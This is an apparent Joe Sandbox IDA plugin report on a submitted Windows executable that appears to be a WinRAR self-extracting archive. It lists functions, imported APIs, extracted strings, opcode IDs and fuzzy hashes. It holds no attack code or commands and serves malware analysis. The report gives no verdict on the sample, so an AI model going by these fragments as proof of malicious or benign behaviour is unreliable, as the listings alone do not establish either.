                                                                                • Opcode ID: a0c8fcaef59427837b2a7c7753e3d717a8442860a15e47712294eddcbb527c28
                                                                                • Instruction ID: be8feb671d1ae02c355acc6bd41c5ab03ec0f96bdfe5ef6b6f8fba1b609f9d6a
                                                                                • Opcode Fuzzy Hash: a0c8fcaef59427837b2a7c7753e3d717a8442860a15e47712294eddcbb527c28
                                                                                • Instruction Fuzzy Hash: D9118C3AA18BC195E7618F21E4187EA7361FF88F88F884031DA4DA3656EF3CD949C744
                                                                                APIs
                                                                                  • Part of subcall function 00007FF6559324C0: CreateFileW.KERNELBASE ref: 00007FF65593259B
                                                                                  • Part of subcall function 00007FF6559324C0: GetLastError.KERNEL32 ref: 00007FF6559325AE
                                                                                  • Part of subcall function 00007FF6559324C0: CreateFileW.KERNEL32 ref: 00007FF65593260E
                                                                                  • Part of subcall function 00007FF6559324C0: GetLastError.KERNEL32 ref: 00007FF655932617
                                                                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6559315D0
                                                                                  • Part of subcall function 00007FF655933980: MoveFileW.KERNEL32 ref: 00007FF6559339BD
                                                                                  • Part of subcall function 00007FF655933980: MoveFileW.KERNEL32 ref: 00007FF655933A34
                                                                                Similarity
                                                                                • API ID: File$CreateErrorLastMove$_invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 34527147-0
                                                                                • Opcode ID: e551f5cd72cc32021c0545c09a5d852fa8adbb9b535e4bd48ae0dc113e77b3ec
                                                                                • Instruction ID: 71d2c99c87110c2d3b811c7b265fdd66733b9074559395e6f74700c58acbc5b2
                                                                                • Opcode Fuzzy Hash: e551f5cd72cc32021c0545c09a5d852fa8adbb9b535e4bd48ae0dc113e77b3ec
                                                                                • Instruction Fuzzy Hash: 8F91B32AB18686C2EE10DB66D4482AD6361FB54FC8F495032EE4DA7BA6DF3CD945C340
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: Version
                                                                                • String ID:
                                                                                • API String ID: 1889659487-0
                                                                                • Opcode ID: 6220f8f0736b52f52a4f9f0684f7fcd1da0b773ba531a70ae5974f71c0de4052
                                                                                • Instruction ID: 5207ac2f02719a4a947fc2c7765e43c9b3811d5ff2a43a9e0b673e6d019cc541
                                                                                • Opcode Fuzzy Hash: 6220f8f0736b52f52a4f9f0684f7fcd1da0b773ba531a70ae5974f71c0de4052
                                                                                • Instruction Fuzzy Hash: 0C012D7AA18582C7F7248B00E84877A33A1FB98B19F580235D56DA2796DF3CF9048E00
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID: 0
                                                                                • API String ID: 3215553584-4108050209
                                                                                • Opcode ID: 0fbd957179d89af9e1d3453d65279f22830f04fe064c784c04e338e6c7bf3646
                                                                                • Instruction ID: 0caa815ef3898140707f7b8f3da95eaf3b17eb6b88e7ed62b0aabb790c517b72
                                                                                • Opcode Fuzzy Hash: 0fbd957179d89af9e1d3453d65279f22830f04fe064c784c04e338e6c7bf3646
                                                                                • Instruction Fuzzy Hash: F181D529A182C246FBA89A1580486FD22E0EF51F4EF7C1531DD49E7697CF2DEC66C740
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID: 0
                                                                                • API String ID: 3215553584-4108050209
                                                                                Strings
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: gj
                                                                                • API String ID: 0-4203073231
                                                                                Strings
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @
                                                                                • API String ID: 0-2766056989
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: HeapProcess
                                                                                • String ID:
                                                                                • API String ID: 54951025-0
                                                                                • Opcode ID: 4ce929ddb23f73c0a8458b43b9ad49d4d7e2a2f746430c3d48bba7e89996d797
                                                                                • Instruction ID: cbd854c4c38b39a897815c0aabf03f96b30553c43b19618b2ef105e8abee6c8c
                                                                                • Opcode Fuzzy Hash: 4ce929ddb23f73c0a8458b43b9ad49d4d7e2a2f746430c3d48bba7e89996d797
                                                                                • Instruction Fuzzy Hash: 97B09228E17B87C2EA082B116C8A29422E4BF48B04F9C8038C10CE1321DF2C28A94701
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f10b3c0000bd651423828cb986904098d4bd6c393877fd54d7a895255c38939a
                                                                                • Instruction ID: 9bc2119b1775fefd9fea3790b618ce6430186310f4e96d068f8ee4bab83717bd
                                                                                • Opcode Fuzzy Hash: f10b3c0000bd651423828cb986904098d4bd6c393877fd54d7a895255c38939a
                                                                                • Instruction Fuzzy Hash: 7482B1AAA096C186D715CE24D4482BC7BA1F755F8CF1D8136DAAE97386EF3C9C85C310
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: fb6bb4a62616f0bcd3e2e2126cd32946fe2ad160a7c0dbd4e5bd03ed1428d6a6
                                                                                • Instruction ID: 3346f6346654b341ec80febf2a9caf754a7a22660b8cf0d0c81ac24d04a3b0fe
                                                                                • Opcode Fuzzy Hash: fb6bb4a62616f0bcd3e2e2126cd32946fe2ad160a7c0dbd4e5bd03ed1428d6a6
                                                                                • Instruction Fuzzy Hash: D8627D9AD3AF9A1EE303A53954131D2E35C0EF74C9551E31BFCE431E66EB92A6832314
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 48af5ed364a5f24a1952bf7eddbdda76aa6abd9a5dc0519f651bf09102684f27
                                                                                • Instruction ID: 905259e257549c4da9a90ce32ce9c3b66572cad59aa79100910b08800cb06762
                                                                                • Opcode Fuzzy Hash: 48af5ed364a5f24a1952bf7eddbdda76aa6abd9a5dc0519f651bf09102684f27
                                                                                • Instruction Fuzzy Hash: CF82E0BAA096C18AD725CE68D4486FC7BA1FB55F4CF088136CAA997786CF3C9C45C710
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ffdf8f5a64276e3eb417e3b9ae5b43350349d41efb04db03fca9f8ba9e24336f
                                                                                • Instruction ID: 38c7f2cf72c7f01a3c168281e9d816dd2c9eb99ee62ad41cf96b0d5586d298d6
                                                                                • Opcode Fuzzy Hash: ffdf8f5a64276e3eb417e3b9ae5b43350349d41efb04db03fca9f8ba9e24336f
                                                                                • Instruction Fuzzy Hash: 5C22E477B246908BD728CF15C89AA5E3766F798748B4B8228DF0ACB785DB3CD505CB40
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 21143e83615dcc23e36b64f0d60848ac948cba63854c17a605a1a3ec217f9251
                                                                                • Instruction ID: 78c2a877f8316aa04dc4e2577f6d8730c0d1b2720097ec7facd8433f0ee7280d
                                                                                • Opcode Fuzzy Hash: 21143e83615dcc23e36b64f0d60848ac948cba63854c17a605a1a3ec217f9251
                                                                                • Instruction Fuzzy Hash: 2832C1B6A041D18BE7188F24D558ABC37A1F754B4CF098139DA9A97B89EF3CEC64C740
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c3190ea2af27d5756d92182682109c7c4eb2d5c381fcec9ad387f57713ef71fe
                                                                                • Instruction ID: a4cc1254bd3ae93cd155afb2ff7ba68765c29f293349124511719fbff30cd9fd
                                                                                • Opcode Fuzzy Hash: c3190ea2af27d5756d92182682109c7c4eb2d5c381fcec9ad387f57713ef71fe
                                                                                • Instruction Fuzzy Hash: B8E1C5AAA092C2CAEB64CF29A44826D7791FB44B4CF0D4135DB9DA7746EF3CED418704
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3d9f1d4af68ebc00f7ab7abf4cea58f5074969ee2768498b55c72978f68bcf28
                                                                                • Instruction ID: c15f872c22971bf2372cd4ba400b777921e1bc0b0440686a32d72c2999d3adf7
                                                                                • Opcode Fuzzy Hash: 3d9f1d4af68ebc00f7ab7abf4cea58f5074969ee2768498b55c72978f68bcf28
                                                                                • Instruction Fuzzy Hash: 1FB1D1A6B05BC992DE58CA75D50C6E9A391BB04FC8F488036DEAD67742DF3CE995C300
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc
                                                                                • String ID:
                                                                                • API String ID: 190572456-0
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                • String ID: :$EFS:$LOGGED_UTILITY_STREAM$:$I30:$INDEX_ALLOCATION$:$TXF_DATA:$LOGGED_UTILITY_STREAM$::$ATTRIBUTE_LIST$::$BITMAP$::$DATA$::$EA$::$EA_INFORMATION$::$FILE_NAME$::$INDEX_ALLOCATION$::$INDEX_ROOT$::$LOGGED_UTILITY_STREAM$::$OBJECT_ID$::$REPARSE_POINT
                                                                                • API String ID: 3668304517-727060406
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                                • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                • API String ID: 2565136772-3242537097
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                                                                                • String ID: DXGIDebug.dll$UNC$\\?\
                                                                                • API String ID: 4097890229-4048004291
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskDialog
                                                                                • String ID: GETPASSWORD1$Software\WinRAR SFX
                                                                                • API String ID: 431506467-1315819833
                                                                                • Opcode ID: cbdb2342dbc27246140afa92192789482b4dc38f3de2603255fba98438e470aa
                                                                                • Instruction ID: fdd3ef1a7babaf4af26c0581d0ec47b8ecb7bcf6f9b0a657b4bc62e8ee05feac
                                                                                • Opcode Fuzzy Hash: cbdb2342dbc27246140afa92192789482b4dc38f3de2603255fba98438e470aa
                                                                                • Instruction Fuzzy Hash: 59B1C06AF197C285FB008BA4D4482AC2372AF45B9CF484235DA6C76ADADF3CE955C341
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                                • API String ID: 3215553584-2617248754
                                                                                • Opcode ID: ca8329083cbd7a022b2adefca7a3bb58d0ae1dff90efa4c28dbe4d3f14657870
                                                                                • Instruction ID: 374ce76ff9b0b45cc70aa92aa8819b90a648ac46b10cf11b42e0d55611d369e3
                                                                                • Opcode Fuzzy Hash: ca8329083cbd7a022b2adefca7a3bb58d0ae1dff90efa4c28dbe4d3f14657870
                                                                                • Instruction Fuzzy Hash: 0141D57AA05B8589E714CF24E8557DD33A4EB14B98F084136EE4C93B56DF3DD429C384
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                Similarity
                                                                                • API ID: Window$ButtonCheckedObject$ClassDeleteLongName
                                                                                • String ID: STATIC
                                                                                • API String ID: 781704138-1882779555
                                                                                • Opcode ID: 028936735c5caa7e1c5955390d3996a5d13f8d6e72d7f98742e6e6c768b0ab82
                                                                                • Instruction ID: 113ea97a2388a679f67956f98cd4c55afe43f36bd5d60e81b7af475c83d9cf72
                                                                                • Opcode Fuzzy Hash: 028936735c5caa7e1c5955390d3996a5d13f8d6e72d7f98742e6e6c768b0ab82
                                                                                • Instruction Fuzzy Hash: BE317029B0868286FA609B12A56C7B96391FF89FD8F081434DD9D97B57DF3CEC068740
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn$AllocGlobal
                                                                                • String ID: </html>$<html>$<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                • API String ID: 2721297748-1533471033
                                                                                • Opcode ID: d8862c3025e57af8a5778f9936a91020890481e3bad1d2e12bbb9941efaf755e
                                                                                • Instruction ID: 9e3678c8724989b2594ac5001ff2cb95d0c624c717421b90b3d2b82583fb0baa
                                                                                • Opcode Fuzzy Hash: d8862c3025e57af8a5778f9936a91020890481e3bad1d2e12bbb9941efaf755e
                                                                                • Instruction Fuzzy Hash: 3181A06AB18A8685FB00DBA5D8581ED2371AF49B8CF480135CE5DA769BDF3CDD0AC340
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                Similarity
                                                                                • API ID: Item$Text
                                                                                • String ID: LICENSEDLG
                                                                                • API String ID: 1601838975-2177901306
                                                                                • Opcode ID: e29db3841e3cac596c2aa5df9f59b5580221106af80a371471668d29e16b4ce4
                                                                                • Instruction ID: 2fb9ec56df76d1d6f923bbf3745d3f1630af8f815ee227dcc36debfa3f8eb0c6
                                                                                • Opcode Fuzzy Hash: e29db3841e3cac596c2aa5df9f59b5580221106af80a371471668d29e16b4ce4
                                                                                • Instruction Fuzzy Hash: 8F418F39A1869282FB108B11A85C7792362FF85F88F0C4035D95EA7B97DF3DAD468302
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                Similarity
                                                                                • API ID: AddressProc$CurrentDirectoryProcessSystem
                                                                                • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                                                                                • API String ID: 2915667086-2207617598
                                                                                • Opcode ID: 6794cfd2df2083ddb130d433e4ca33b69faefb70ddab7dfcfa84983386d80e8a
                                                                                • Instruction ID: eb64e5714213aa0d5c6b8e6fbd84c595fca6079138b7a0837fa54a5b7c891fd5
                                                                                • Opcode Fuzzy Hash: 6794cfd2df2083ddb130d433e4ca33b69faefb70ddab7dfcfa84983386d80e8a
                                                                                • Instruction Fuzzy Hash: E931643CA09B8280FA148B12A99C17527E6AF44F98F0E4036C85EE73A7DF3DED458341
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                • String ID: $
                                                                                • API String ID: 3668304517-227171996
                                                                                • Opcode ID: 3e5c1c837bf5b094cbf702a79e584555beddaf0efbc8773bf26ad6af60c03e6c
                                                                                • Instruction ID: 6c83d4f4e2dad2e939438fd209844edb4bf1dab3ada2d789ec44fd192442939f
                                                                                • Opcode Fuzzy Hash: 3e5c1c837bf5b094cbf702a79e584555beddaf0efbc8773bf26ad6af60c03e6c
                                                                                • Instruction Fuzzy Hash: BFF1BD6AF15A8680EF009B64D44C1BC2361BB44F9CF585631CAADA7BD6DF7CED948340
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                Similarity
                                                                                • API ID: Is_bad_exception_allowedabortstd::bad_alloc::bad_alloc
                                                                                • String ID: csm$csm$csm
                                                                                • API String ID: 2940173790-393685449
                                                                                • Opcode ID: 65edb01f61f21fff02eaccc9a46b43a233fa456fccf40e480b66f774ee54b1a7
                                                                                • Instruction ID: 131c5731c98ce94d7fc0027d0dba40c700eefd6393f9766880d1e393b5dfa24e
                                                                                • Opcode Fuzzy Hash: 65edb01f61f21fff02eaccc9a46b43a233fa456fccf40e480b66f774ee54b1a7
                                                                                • Instruction Fuzzy Hash: B1E1BF7A9086C28AEB109F24D4883AD77A0FF45B4DF580135DA8DA7697CF3CE8A1C700
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                Similarity
                                                                                • API ID: AllocClearStringVariant
                                                                                • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                                • API String ID: 1959693985-3505469590
                                                                                • Opcode ID: a8b35b7bcd37d82ee4aaa20c3b876beaab518b1de9e1ce59ea14af8b32f1fe8d
                                                                                • Instruction ID: 329bea5c3dc7b40703c7704df04aa8bd3ec00a9c63aad7e0d4a01e6214882b91
                                                                                • Opcode Fuzzy Hash: a8b35b7bcd37d82ee4aaa20c3b876beaab518b1de9e1ce59ea14af8b32f1fe8d
                                                                                • Instruction Fuzzy Hash: 5A71277AA14B85C5EB208F25E8945AD37A0FB88F9CB091132EA4E93B65DF3CD944C340
                                                                                APIs
                                                                                • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF6559574F3,?,?,?,00007FF65595525E,?,?,?,00007FF655955219), ref: 00007FF655957371
                                                                                • GetLastError.KERNEL32(?,?,00000000,00007FF6559574F3,?,?,?,00007FF65595525E,?,?,?,00007FF655955219), ref: 00007FF65595737F
                                                                                • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF6559574F3,?,?,?,00007FF65595525E,?,?,?,00007FF655955219), ref: 00007FF6559573A9
                                                                                • FreeLibrary.KERNEL32(?,?,00000000,00007FF6559574F3,?,?,?,00007FF65595525E,?,?,?,00007FF655955219), ref: 00007FF6559573EF
                                                                                • GetProcAddress.KERNEL32(?,?,00000000,00007FF6559574F3,?,?,?,00007FF65595525E,?,?,?,00007FF655955219), ref: 00007FF6559573FB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                Similarity
                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                • String ID: api-ms-
                                                                                • API String ID: 2559590344-2084034818
                                                                                • Opcode ID: eedfc97f7024c66fbeb39a7219499b253e22696fd1fdab2c5f769bf1fd383016
                                                                                • Instruction ID: eff5a5bf8e333eaa618de09b55de6ce88f6b820fd7b1dcaa0f67e2d03e080b41
                                                                                • Opcode Fuzzy Hash: eedfc97f7024c66fbeb39a7219499b253e22696fd1fdab2c5f769bf1fd383016
                                                                                • Instruction Fuzzy Hash: 6931E429A1A7C281EE12AB06A8485B523D5FF04FF9F1D4535DE1DA7382DF3CE9548310
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(?,?,?,00007FF655951573,?,?,?,00007FF65595192A), ref: 00007FF65595162B
                                                                                • GetProcAddress.KERNEL32(?,?,?,00007FF655951573,?,?,?,00007FF65595192A), ref: 00007FF655951648
                                                                                • GetProcAddress.KERNEL32(?,?,?,00007FF655951573,?,?,?,00007FF65595192A), ref: 00007FF655951664
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$HandleModule
                                                                                • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                • API String ID: 667068680-1718035505
                                                                                • Opcode ID: 4fe35f58cd4175722fa2f4edd42b7d77b08fa8d78ae8e9bf73ccac7c2071e7f8
                                                                                • Instruction ID: 50ada5a8a2890b88277b73b9dc9be95aecbf1f74e3670cf78b4e69b2ab36cf9a
                                                                                • Opcode Fuzzy Hash: 4fe35f58cd4175722fa2f4edd42b7d77b08fa8d78ae8e9bf73ccac7c2071e7f8
                                                                                • Instruction Fuzzy Hash: FE115E28A1EBC682FE648B00EA582B413916F08F9DF4D4435C85DA6356FF3CACAC9650
                                                                                APIs
                                                                                  • Part of subcall function 00007FF6559351A4: GetVersionExW.KERNEL32 ref: 00007FF6559351D5
                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF655925AB4), ref: 00007FF65593ED8C
                                                                                • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF655925AB4), ref: 00007FF65593ED98
